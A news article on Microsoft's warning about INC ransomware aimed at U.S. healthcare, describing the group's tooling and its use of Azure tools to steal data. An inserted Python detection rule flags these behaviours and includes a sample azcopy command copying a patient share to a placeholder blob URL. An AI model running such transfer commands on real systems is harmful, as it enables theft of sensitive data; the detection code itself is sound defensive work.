Microsoft Warns of New Ransomware Threat in Healthcare

Lilu Anderson

Microsoft Alerts on New INC Ransomware Threat

Microsoft, a leading technology company, has issued a warning about a new ransomware strain known as INC, which is being used by a financially motivated threat actor to attack the U.S. healthcare sector. This development signals an alarming rise in cybersecurity threats targeting critical industries.

Who is Behind the Attacks?

The threat intelligence team at Microsoft has identified the cybercriminals behind these attacks as Vanilla Tempest, previously known as DEV-0832. The group has been linked to a series of attacks and obtains initial access through GootLoader infections; GootLoader is a malware loader operated by a separate actor, Storm-0494, to compromise systems.

Tools and Techniques Used

After gaining initial access, Vanilla Tempest employs a range of tools to penetrate deeper into the network. Notably, they use the Supper backdoor, a malicious tool enabling remote access, alongside legitimate software such as AnyDesk RMM (Remote Monitoring and Management) and the MEGA data synchronization tool. This combination helps them move laterally across the network using Remote Desktop Protocol (RDP) and deploy the INC ransomware payload via Windows Management Instrumentation (WMI) Provider Host.

Previous Activities and Known Aliases

Vanilla Tempest has been active since July 2022, targeting sectors like education, healthcare, IT, and manufacturing. They have used a variety of ransomware families, including BlackCat, Quantum Locker, Zeppelin, and Rhysida. Interestingly, this group is also known as Vice Society, recognized for using existing lockers rather than developing custom malware.

Increasing Use of Cloud Tools for Data Theft

There is an increasing trend among ransomware groups like BianLian and Rhysida to utilize tools such as Azure Storage Explorer and AzCopy. These are typically used for managing data in Azure cloud storage but are being repurposed for exfiltrating sensitive data from attacked networks. This tactic helps them evade detection while transferring large amounts of data to the cloud.
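The tradecraft described in the two sections above (a payload launched from WMI Provider Host, AnyDesk and MEGA for access and sync, AzCopy or Storage Explorer pushing data to Azure blob storage) can be expressed as a small triage rule over process-creation telemetry. The following is an added example, not code from the article or from Microsoft's report; it runs over constructed events, and the Sysmon-style field names, the non-AzCopy binary names and the benign-child allow-list for WmiPrvSE.exe are assumptions.

```python
import re

# Binaries for the tools the article names. azcopy.exe is AzCopy's real binary name;
# the other three names are assumptions (they vary by product version and installer).
CLOUD_TRANSFER_TOOLS = {"azcopy.exe", "storageexplorer.exe"}
REMOTE_ACCESS_TOOLS = {"anydesk.exe", "megasync.exe"}
WMI_HOST = "wmiprvse.exe"  # WMI Provider Host, the parent named for payload deployment
# WmiPrvSE.exe spawns few children in normal operation; this allow-list is an assumption.
BENIGN_WMI_CHILDREN = {"werfault.exe", "conhost.exe"}
AZURE_BLOB = re.compile(r"https?://[\w.-]+\.blob\.core\.windows\.net", re.I)

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return finding tags for one process-creation event (Sysmon Event ID 1 field names)."""
    image = basename(event["Image"])
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    findings = []
    if parent == WMI_HOST and image not in BENIGN_WMI_CHILDREN:
        findings.append("wmi_provider_host_spawned_child")
    if image in CLOUD_TRANSFER_TOOLS and AZURE_BLOB.search(cmd):
        findings.append("azure_blob_transfer")
    if image in REMOTE_ACCESS_TOOLS:
        findings.append("remote_access_or_sync_tool")
    return findings

def triage_all(events):
    """Return (host, image name, findings) for every event that raised at least one finding."""
    return [(e["Host"], basename(e["Image"]), triage(e)) for e in events if triage(e)]

# Constructed sample events; hosts, paths and the SAS token placeholder are not from the article.
SAMPLE_EVENTS = [
    {"Host": "WS01", "Image": r"C:\Users\Public\payload.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "CommandLine": "payload.exe"},
    {"Host": "DC01", "Image": r"C:\Windows\System32\WerFault.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "CommandLine": "WerFault.exe -u"},
    {"Host": "FS01", "Image": r"C:\Tools\azcopy.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'azcopy copy "D:\Shares\Patients" "https://example.blob.core.windows.net/c?sv=<SAS>"'},
    {"Host": "WS02", "Image": r"C:\Program Files\AnyDesk\AnyDesk.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "AnyDesk.exe"},
]

if __name__ == "__main__":
    for host, image, findings in triage_all(SAMPLE_EVENTS):
        print(f"{host}: {image} -> {', '.join(findings)}")
```

The WerFault event shows why the allow-list matters: crash reporting is a legitimate child of WMI Provider Host, and without the exception it would fire on every crash.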

Understanding Technical Terms

  • Ransomware: A type of malicious software designed to block access to a computer system until a sum of money is paid.
  • Lateral movement: A technique used by attackers to move through a compromised network to gain access to other systems or data.
  • Exfiltration: The unauthorized transfer of data from a computer.

This surge in ransomware activity, especially targeting vital sectors like healthcare, highlights the urgent need for robust cybersecurity measures to protect sensitive data and prevent operational disruptions.

Lilu Anderson is a technology writer and analyst with over 12 years of experience in the tech industry. A graduate of Stanford University with a degree in Computer Science, Lilu specializes in emerging technologies, software development, and cybersecurity. Her work has been published in renowned tech publications such as Wired, TechCrunch, and Ars Technica. Lilu’s articles are known for their detailed research, clear articulation, and insightful analysis, making them valuable to readers seeking reliable and up-to-date information on technology trends. She actively stays abreast of the latest advancements and regularly participates in industry conferences and tech meetups. With a strong reputation for expertise, authoritativeness, and trustworthiness, Lilu Anderson continues to deliver high-quality content that helps readers understand and navigate the fast-paced world of technology.